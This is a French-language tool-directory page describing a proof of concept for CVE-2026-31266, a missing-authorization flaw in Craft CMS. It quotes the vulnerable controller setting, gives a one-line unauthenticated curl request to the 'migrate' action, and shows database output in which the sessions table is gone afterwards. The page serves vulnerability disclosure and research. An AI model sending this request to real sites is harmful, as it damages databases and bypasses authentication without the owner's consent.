Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Craftcms-PoC-CVE-2026-31266 — Recherche en sécurité sur le mécanisme d'authentification de Craft CMS | Kitploit
Outils/GitHubGitHub/0xrixet/craftcms-poc-cve-2026-31266
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentification
GitHub0xrixet/craftcms-poc-cve-2026-31266

Craftcms-PoC-CVE-2026-31266

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Recherche en sécurité sur le mécanisme d'authentification de Craft CMS

Voir le dépôt
37il y a 3 moisPas encore vérifié

CVE-2026-31266 - Autorisation manquante dans Craft CMS

Informations CVE

ChampValeur
ID CVECVE-2026-31266
FournisseurPixel & Tonic
ProduitCraft CMS
Versions concernées<= 5.9.5
CWECWE-862 (Autorisation manquante)
CVSS7.3 (Élevé)
Chercheur en sécurité0xRIXET

Contenu des preuves

  • screenshots/ - Démonstrations de preuve de concept

Vulnérabilité

  • Type: Autorisation manquante
  • Impact: Contournement d'authentification
  • Fournisseur: Craft CMS
  • Statut: CVE-2026-31266

Code vulnérable

Fichier: src/controllers/AppController.php

Lignes 65-68:

protected array|bool|int $allowAnonymous = [
    'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];

Preuve de concept

# Avec allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"

Preuve

Avant l'attaque :

mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+

Après l'attaque :

mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist

Références

  • Dépôt Craft CMS
  • Documentation de sécurité Craft
  • Entrée NVD

Contact

  • Chercheur en sécurité: 0xRIXET | Mohammed Al-shehri
  • Twitter | X : @0xRIXET
  • Email: [email protected]
Télécharger l’outil